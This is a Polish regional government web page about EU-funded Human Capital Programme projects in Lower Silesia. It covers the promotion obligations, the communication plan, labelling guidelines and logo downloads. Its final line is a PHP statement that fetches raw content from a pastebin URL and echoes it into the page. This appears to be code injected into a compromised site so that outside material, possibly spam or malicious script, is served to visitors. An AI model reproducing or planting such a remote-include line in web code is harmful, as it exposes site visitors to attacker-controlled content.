Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Informacja i promocja w ramach Programu Operacyjnego Kapitał Ludzki

Obowiązek prowadzenia działań informacyjnych i promocyjnych zawarty jest w Rozporządzeniu Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności i uchylającym rozporządzenie (WE) nr 1260/1999.

Za koordynację działań informacyjnych i promocyjnych PO KL na poziomie całego Programu odpowiada Instytucja Zarządzająca. W procesie komunikacji uczestniczą również Instytucje odpowiedzialne za realizację Programu czyli: Instytucje Pośredniczące, Instytucje Pośredniczące II stopnia, Komitet Monitorujący i Podkomitety Monitorujące, Krajowy i Regionalne Ośrodki EFS oraz Instytucja Koordynująca NSRO i Komisja Europejska. Za wsparcie działań innowacyjnych i ponadnarodowych jest odpowiedzialna Krajowa Instytucja Wspomagająca (KIW).

Na lata 2007-2013 przygotowany został Plan komunikacji Programu Kapitał Ludzki, który jest dokumentem strategicznym i wyznacza orientacyjne kierunki działań informacyjnych i promocyjnych podejmowanych w latach 2007-2015.

Plan komunikacji PO KL jest zgodny z Wytycznymi Ministra Rozwoju Regionalnego w zakresie informacji i promocji Narodowych Strategicznych Ram Odniesienia 2007-2013 oraz Strategią komunikacji funduszy europejskich w Polsce w ramach Narodowej Strategii Spójności w latach 2007-2013, która spełnia kryteria Planu komunikacji określone w Rozporządzeniu Komisji (WE) nr 1828/2006 z dnia 8 grudnia 2006 r. określającym przepisy wykonawcze do Rozporządzenia (WE) nr 1083/2006 odnośnie obowiązków informacyjnych i komunikacyjnych stosowanych przez Państwa Członkowskie.

Jest to dokument określający zasady komunikacji w ramach Programu z uwzględnieniem spójnej wizualizacji i przekazu. Wyznacza kierunki komunikacji dla wszystkich instytucji i podmiotów, które z racji pełnionych funkcji lub realizowanych przedsięwzięć mają obowiązek prowadzenia działań informacyjno-promocyjnych w tym zakresie.

Stosowanie zasad i rozwiązań przyjętych w tym dokumencie jest obligatoryjne dla wszystkich instytucji zaangażowanych w działania informacyjne i promocyjne Programu Kapitał Ludzki i Europejskiego Funduszu Społecznego.

Integralną częścią Planu komunikacji PO KL są Wytyczne dotyczące oznaczania projektów w ramach Programu Kapitał Ludzki, które są załącznikiem Planu komunikacji PO KL.

Wytyczne dotyczące oznaczania projektów w ramach Programu Kapitał Ludzki

Celem Wytycznych jest ustalenie jednolitej interpretacji przepisów europejskich w sprawie prowadzenia działań informacyjnych i promocyjnych dotyczących pomocy udzielanej z Europejskiego Funduszu Społecznego, w szczególności wynikających z Rozporządzenia Komisji (WE) nr 1828/2006 z 8 grudnia 2006 r. ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady (WE) nr 1083/2006 ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, a także Funduszu Spójności oraz rozporządzenia (WE) nr 1080/2006 Parlamentu Europejskiego i Rady w sprawie Europejskiego Funduszu Rozwoju Regionalnego, a także Wytycznych Ministra Rozwoju Regionalnego w sprawie informacji i promocji.

Wytyczne te dotyczą oznaczania projektów i odnoszą się zarówno do sposobów oznaczania projektów realizowanych w ramach Programu Kapitał Ludzki, jak i wszystkich innych działań związanych z promocją i informowaniem o Programie.

Jak opisywać i oznaczać projekty współfinansowane z EFS w ramach PO KL?

Obowiązek informowana o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego dotyczy wszystkich projektów realizowanych w ramach Programu Kapitał Ludzki, niezależnie od trybu wyboru projektów, tj. projektów konkursowych, systemowych i indywidualnych, a także wszelkich działań realizowanych w ramach Pomocy Technicznej Programu.

Za informację o współfinansowaniu, o której mowa w Wytycznych, rozumie się co najmniej informację o współfinansowaniu przez Europejski Fundusz Społeczny wraz z logotypem Programu Kapitał Ludzki oraz logo Unii Europejskiej wraz z odniesieniem (podpisem) Europejski Fundusz Społeczny, stosowanymi zgodnie z zasadami opisanymi w niniejszym dokumencie.

Wytyczne określają, w jaki sposób powinny być „oznaczane projekty”. W przypadku EFS dotyczy to przede wszystkim oznaczania pomieszczeń, w których realizowane są projekty (tak, by każdy wchodzący natychmiast to zauważył), oznaczanie sprzętu i wyposażenia zakupionego w ramach projektu, publikacji, materiałów informacyjnych, dokumentów, stanowiska pracy, które jest współfinansowane z EFS.

Informacja o współfinansowaniu powinna być także przekazywana w trakcie trwania konferencji, seminariów, warsztatów, spotkań informacyjnych, targów i innych imprez promocyjnych.

Wytyczne opisują również jak stosować logotypy PO KL i UE w latach 2007-2015.

 

Plan komunikacji PO KL  - wersja aktualna

 Dokument do pobrania

 

Plan komunikacji PO KL - wersja archiwalna

 Dokument do pobrania

Plan komunikacji PO KL (aktualizacja 5 sierpnia 2009 r.)

Dokument do pobrania

Zmiany w treści dokumentu (publikacja 5 sierpnia 2009 r.) nie obejmują Wytycznych dotyczących oznaczania projektów w ramach Programu Kapitał Ludzki i dotyczą Rozdziału IX Ocena realizacji Planu (tabeli Wskaźniki dla działań komunikacyjnych i metody ich badań) oraz aktualizacji danych kontaktowych komórki odpowiedzialnej za wdrażanie Planu komunikacji PO KL oraz działania informacyjne i promocyjne.

Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki - 31 grudnia 2013 (NOWE)

 Dokument do pobrania

 

Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (4 luty 2009 r.)

Dokument do pobrania

Wytyczne w zakresie informacji i promocji (10 czerwca 2010 r.) NOWE

Dokument do pobrania

Strategia komunikacji Funduszy Europejskich na lata 2007-2013 (dokument zaakceptowany przez Komisję Europejską 15 października 2008 r.)
Dokument do pobrania

Poradnik „Jak promować projekty współfinansowane ze środków Europejskiego Funduszu Społecznego”,prezentuje zagadnienia związane z informacją i promocją projektów realizowanych w ramach PO KL w Polsce, będąc wskazówką zarówno dla osób dopiero przygotowujących projekt, jak i dla tych, którzy są już w trakcie jego realizacji.
Dokument do pobrania

Logotypy PO KL do pobrania:

Flaga UE:

Flaga UE z podpisem Unia Europejska i Europejski Fundusz Społeczny:

Flaga UE z podpisem Europejski Fundusz Społeczny:

Informacja o korzystaniu z logotypów UMWD – więcej informacji

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");